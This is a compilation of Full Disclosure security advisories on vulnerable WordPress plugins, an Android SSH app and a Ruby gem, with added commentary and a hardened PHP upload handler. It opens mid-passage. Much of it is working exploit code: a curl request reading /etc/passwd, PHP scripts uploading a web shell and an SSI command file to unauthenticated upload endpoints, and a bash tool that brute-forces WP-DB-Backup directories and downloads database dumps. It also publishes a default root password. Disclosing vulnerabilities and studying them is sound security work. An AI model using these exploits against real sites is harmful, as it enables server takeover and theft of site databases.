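Two details matter in practice. The prefix comparison uses $base plus a separator, so a sibling directory such as uploads-old cannot pass as "inside" uploads. And the check runs on the realpath() result rather than on a cleaned-up request string, which is why it also catches the symlink case that a string filter for "../" misses.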

CVEID: 2015-4703
OSVDB:
Exploit Code:
$ curl -G --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
(-G sends the --data pairs as query parameters, matching the $_GET reads above.)


[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin

2015-06-10 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in 
aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: 
https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plug...@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly 
Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in
aviary-image-editor-add-on-for-gravity-forms/includes/upload.php: an
unauthenticated user can upload any file to the system, including a .php file.
upload.php doesn't check that the user is authenticated, so a simple POST
uploads arbitrary code to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
the code doesn't check for an authenticated WordPress user:

<?php

$filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
if (file_exists($filename)) {
include_once($filename);
} else {
include_once("../../../../wp-load.php");
}
echo "Here";
$image_file = $_FILES['gf_aviary_file'];
if($image_file['name']!=''){
 $max_file_size =  4*1024*1024;
 $file_size = intval($image_file['size']);
 if( $file_size > $max_file_size ){
 $msg = "File Size is too big.";
 $error_flag = true;
 }
 $extension = strtolower(end(explode('.', $image_file['name'])));
 $aa_options = get_option('gf_aa_options');
 $supported_files = $aa_options['supported_file_format'];
 $supported_files = strtolower($supported_files);
 if(!$error_flag && $supported_files != '' ){
   $supported_files = explode (',', $supported_files);
   if(!in_array($extension, $supported_files)){
  $msg = "No Supported file.";
  $error_flag = true;
   }
 }
 if(!$error_flag){
$wp_upload_dir = wp_upload_dir();
if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
 mkdir($wp_upload_dir['basedir'].'/gform_aviary');
}
$upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
$upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
$file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
if(move_uploaded_file($image_file['tmp_name'], $file_name)){
$file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
}
 }
 $return_obj = array('status' => 'success', 'message' => $file_url);
 echo json_encode($return_obj);
 }
?>

CVEID: 2015-4455
OSVDB:
Exploit Code:
<?php
/* Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/* Larry W. Cashdollar @_larry0
   6/7/2015
   shell will be located at http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path\n";
// PHP >= 5.5 expects CURLFile for uploads; the "@path" form is kept for older versions
$upload = class_exists('CURLFile') ? new CURLFile($file_name_with_full_path) : '@'.$file_name_with_full_path;
$post = array('name' => 'shell.php', 'gf_aviary_file' => $upload);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>


[FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17

2015-04-01 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in wordpress plugin 
videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, vendor won't fix: 
http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site 
VideoWhisper Video Consultation is a web based video communication solution 
designed for online video consultations, interactive live presentations, 
trainings, webinars, coaching and online collaboration with webcam support. 
Read more on WordPress Video Presentation plugin home page.

Vulnerability:
wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php allows
unauthenticated remote uploads of a range of file types. Only the last 4
characters of the filename are compared against the allowed list, and that list
includes html, so .shtml passes and gives remote code execution where SSI is
enabled. The code does no user access validation, so anyone can upload files of
these types to an unsuspecting WordPress site:
.shtml, .swf, .zip, .rar, .jpg, jpeg, .png, .gif, .txt, .doc, docx, .htm, html, .pdf, .mp3, .flv, .avi, .mpg, .ppt, .pps
 
The check

if (strstr($filename,'.php')) exit; 

is case-sensitive and can be bypassed with the extension .Php; the 4-character
extension check would then still accept a name like test.Php.shtml.

<?php 
if ($_GET["room"]) $room=$_GET["room"]; 
if ($_POST["room"]) $room=$_POST["room"]; 
$filename=$_FILES['vw_file']['name']; 
include_once("incsan.php"); 
sanV($room); 
if (!$room) exit; 
sanV($filename);
if (!$filename) exit; 
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit; 
if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 
$destination="uploads/".$room."/"; 
if ($_GET["slides"]) $destination .= "slides/"; 
$ext=strtolower(substr($filename,-4)); 
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");
if (in_array($ext,$allowed)) 
move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 
?>loadstatus=1
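The upload handlers in wp-powerplaygallery, the Aviary add-on and VideoWhisper fail in the same three places: no authentication, an extension test that looks at the wrong part of the name (the last four characters, or the text after the last dot with a case-sensitive ".php" blacklist), and a destination built from client input. The following is an added example of my own, not code from any of these plugins, that keeps a reduced copy of the VideoWhisper-style check for comparison and then shows a hardened handler. The form field name, nonce action and allow-list are assumptions; the legacy function uses a subset of the plugin's extension list.

```php
<?php
// Added example (mine, not code from wp-powerplaygallery, the Aviary add-on
// or VideoWhisper): the VideoWhisper-style extension check next to a
// hardened upload handler. Assumes it runs inside WordPress; the form field
// "file", the nonce action and the allow-list are assumptions.

// The check from vw_upload.php, reduced to its two tests (subset of the list).
// strstr() is case-sensitive and only the last four characters are compared,
// so "test.Php.shtml" and "page.shtml" both come back allowed.
function vw_legacy_ext_allowed( $filename ) {
    if ( strstr( $filename, '.php' ) ) {
        return false;
    }
    $allowed = array( '.swf', '.zip', '.jpg', 'jpeg', '.png', '.gif', '.txt', '.htm', 'html', '.pdf' );
    return in_array( strtolower( substr( $filename, -4 ) ), $allowed, true );
}

// Hardened check: the whole extension, case-folded, from a sanitized name;
// a short allow-list of non-executable types; and a content check so a PHP
// file renamed to .jpg is rejected regardless of what the server would do.
function upload_is_acceptable( array $file, array $allowed_ext ) {
    if ( empty( $file['tmp_name'] ) || ! is_uploaded_file( $file['tmp_name'] ) ) {
        return false;
    }
    // sanitize_file_name() strips path pieces and appends "_" to intermediate
    // extensions WordPress does not know: "shell.php.jpg" -> "shell.php_.jpg".
    $name = sanitize_file_name( $file['name'] );
    $ext  = strtolower( pathinfo( $name, PATHINFO_EXTENSION ) );
    if ( '' === $ext || ! in_array( $ext, $allowed_ext, true ) ) {
        return false;
    }
    // Content must agree with the name: images have to parse as the claimed
    // type, a PDF has to start with its magic bytes. Anything else is refused
    // even if it is listed in $allowed_ext, because it has no content check.
    $image_mime = array( 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                         'png' => 'image/png',  'gif'  => 'image/gif' );
    if ( isset( $image_mime[ $ext ] ) ) {
        $info = @getimagesize( $file['tmp_name'] );
        return false !== $info && $info['mime'] === $image_mime[ $ext ];
    }
    if ( 'pdf' === $ext ) {
        return '%PDF' === file_get_contents( $file['tmp_name'], false, null, 0, 4 );
    }
    return false;
}

function hardened_upload_handler() {
    if ( ! is_user_logged_in() || ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'plugin_upload', 'nonce' );                 // assumed nonce action

    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_send_json_error( 'no file', 400 );
    }
    $allowed = array( 'jpg', 'jpeg', 'png', 'gif', 'pdf' );          // no html/shtml/swf
    if ( ! upload_is_acceptable( $_FILES['file'], $allowed ) ) {
        wp_send_json_error( 'file type not allowed', 415 );
    }

    // Let WordPress choose the destination under wp-content/uploads and a
    // unique name. No "room", "albumid" or other client-supplied directory
    // touches the path, which also closes the mkdir() traversal in easy2map.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $overrides = array(
        'test_form' => false,
        'mimes'     => array(
            'jpg|jpeg' => 'image/jpeg',
            'png'      => 'image/png',
            'gif'      => 'image/gif',
            'pdf'      => 'application/pdf',
        ),
    );
    $moved = wp_handle_upload( $_FILES['file'], $overrides );
    if ( isset( $moved['error'] ) ) {
        wp_send_json_error( $moved['error'], 500 );
    }
    wp_send_json_success( array( 'url' => $moved['url'] ) );
}
add_action( 'wp_ajax_plugin_upload', 'hardened_upload_handler' );
```

The allow-list deliberately omits html and htm as well as shtml: with SSI or mod_mime handlers in play, "html" on the end of a name says nothing about whether the server will execute it, so the safe rule is to accept only types the server is known to serve as static data.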
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhis_poc.php 
<?php

$uploadfile = "upexp.shtml";
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// PHP >= 5.5 expects CURLFile for uploads; the "@path" form is kept for older versions
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS,
  array('vw_file' => $file, 'name' => 'upexp.shtml', 'room' => '.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;

?>
 
 
upexp.shtml
 
<html>
 
<!--#exec cmd="/usr/bin/date > /tmp/p" -->
 
this is html
</html>
 
 
The uploaded .shtml should then be located in 
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads


[FD] Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin

2014-11-25 Thread Larry W. Cashdollar
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031; assumes the wordpress database is "wordpress" and the table prefix is "wp_"
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite

DATE=20141031; #Date to search

if [ ! -e rainbow ]; then

cat << '-EOF-' > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[] = "0123456789abcdef";
  int x, y, z, a, b;
  for (x = 0; x < 16; x++)
  for (y = 0; y < 16; y++)
  for (z = 0; z < 16; z++)
  for (a = 0; a < 16; a++)
  for (b = 0; b < 16; b++)
  printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
  string[a], string[b]);
return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi

if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching";
for x in `cat rainbow`; do 
CPATH="http://$1/wp-content/backup-$x/";
RESULT=`curl -s --head "$CPATH"|grep 200`;
if [ -n "$RESULT" ]; then #quotes matter: an unquoted empty $RESULT makes [ -n ] succeed
 echo "[+] Location $CPATH Found";
 echo "[+] Received $RESULT";
 echo $x > found.txt;
 break; #break here
fi;
 echo -n "Percent Done: ";
 Y=`echo "scale=6;($Z/$K)*100"|bc`;
 echo -n $Y
 echo "%";
 Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi

# Now that we have the directory lets try to locate the database backup file.

Z=0;
K=999;
for y in `seq -w 0 999`; do 
CPATH="http://$1/wp-content/backup-$x/wordpress_wp_${DATE}_$y.sql"; 
#change WP Database Name and Table Prefix here; $DATE is the backup date set above
RESULT=`curl -s --head "$CPATH"|grep 200`;
if [ -n "$RESULT" ]; then
 echo "[+] Database backup $CPATH Found";
 echo "[+] Received $RESULT";
 wget "$CPATH"
 exit; #break here
fi;
 echo -n "Percent Done: ";
 Y=`echo "scale=2;($Z/$K)*100"|bc`;
 echo -n $Y
 echo "%";
 Z=$(( $Z + 1 ));
done




[FD] Rooted SSH/SFTP Daemon Default Login Credentials

2014-09-11 Thread Larry W. Cashdollar

I stumbled on to this while setting up an android vulnerability testing lab.

Title: Rooted SSH/SFTP Daemon Default Login Credentials

Author: Larry W. Cashdollar, @_larry0

OSVDB-ID: 110742

Date: 9/2/2014

Download: https://play.google.com/store/apps/details?id=web.oss.sshsftpDaemon

Description: This app is a SSH terminal server AND an SFTP file server.

Vulnerability: The software comes pre-configured with a default login of User: 
root, Password: abc123. This weak password is easily guessed, leading to root 
compromise of the Android system.

Recommended Fix: Require the user to set a password upon installation.

Vendor: open.software.solutions[4t]gmail.com, Notified 9/3/2014

Greets to 44CON.



[FD] Remote Command Injection in Ruby Gem sfpagent 0.4.14

2014-04-18 Thread Larry W. Cashdollar
Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14

Date: 4/15/2014

Author: Larry W. Cashdollar, @_larry0

CVE: 2014-2888

Download: http://rubygems.org/gems/sfpagent

Vulnerability
The list string, built from module names while processing the user-supplied
JSON[body] response, is interpolated directly into the system() shell command
on line 649. A module name containing shell metacharacters such as ; can
therefore execute shell commands on the remote system as the user id sfpagent
runs under.

637 code, body = get_data(address, port, '/modules')
638 raise Exception, "Unable to get modules list from #{name}" if code.to_i != 200
639 
640 modules = JSON[body]
641 list = ''
642 schemata.each { |m|
643 list += "#{m} " if File.exist?("#{modules_dir}/#{m}") and
644 (not modules.has_key?(m) or modules[m] != get_local_module_hash(m, modules_dir).to_s)
645 }
646 
647 return true if list == ''
648 
649 if system("cd #{modules_dir}; #{install_module} #{address} #{port} #{list} 1>/dev/null 2>/tmp/install_module.error")
650 Sfp::Agent.logger.info "Push modules #{list}to #{name} [OK]"
651 else
652 Sfp::Agent.logger.warn "Push modules #{list}to #{name} [Failed]"
653 end
654 
655 return true

Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue.

Advisory: http://www.vapid.dhs.org/advisories/spfagent-remotecmd.html
